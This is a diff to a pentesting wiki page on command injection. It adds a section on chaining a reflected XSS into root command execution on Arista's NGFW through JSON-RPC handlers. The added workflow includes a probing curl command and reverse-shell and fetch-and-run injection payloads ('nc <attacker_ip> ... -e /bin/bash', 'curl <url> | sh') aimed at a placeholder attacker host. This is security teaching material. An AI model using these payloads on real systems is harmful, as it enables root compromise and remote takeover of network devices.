Arista NextGen Firewall Chaining Stored XSS to Root Remote C...

src/pentesting-web/command-injection.md

@@ -158,6 +158,17 @@ execFile('/usr/bin/do-something', [
 
 Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
 
+### JSON-RPC admin helpers shelling out (`/bin/sh -c`)
+
+Bishop Fox documented how Arista’s NGFW exposes JSON-RPC endpoints to the management UI where a Java handler builds a `/bin/sh -c` string with attacker-controlled arguments (CVE-2025-6978). Any JSON-RPC request issued with a valid administrator session cookie reaches that handler and commands execute as **root** because the Tomcat/Apache stack runs with full privileges.
+
+#### Attack workflow
+1. **Find the captive portal surface.** `curl -skI https://<target>/capture/handler.py/load_rpc_manager` returning `500 Internal Server Error` shows the captive-portal Python handlers are still callable, which is a prerequisite for both the JSON-RPC helper exposure and the reflected XSS primitive (CVE-2025-6979).
+2. **Trigger the XSS to run attacker JS in an admin context.** The malicious URL can show an innocuous login screen while it background-loads JavaScript that immediately `fetch()`es the JSON-RPC endpoint with the victim’s cookies, as described in the report.
+3. **Replay/modify a legitimate JSON-RPC call.** Use a proxy or browser DevTools to capture an innocuous RPC body from the dashboard, then replace the user-controlled field that the Java helper concatenates (diagnostic commands often expose parameters such as line counts, filenames, or interface names). Appending `;nc <attacker_ip> <port> -e /bin/bash` or `&& curl <url> | sh` inside that field spawns a reverse shell.
+4. **Receive root RCE.** Because the Java helper executes `/bin/sh -c <string>` the injected metacharacters break out of the intended command and run the attacker payload as root. The Bishop Fox write-up also shows this still works on software 17.4 because the patch did not cover every call site, so a single click on the weaponized XSS URL can deliver a reverse shell from the firewall.
+
+
 ### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
 
 Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
@@ -199,12 +210,12 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 
 ## References
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
 - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
 - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
+- [Bishop Fox – Arista NextGen Firewall: Chaining Stored XSS to Root Remote Code Execution](https://bishopfox.com/blog/arista-nextgen-firewall-xss-to-rce-chain)
 
 {{#include ../banners/hacktricks-training.md}}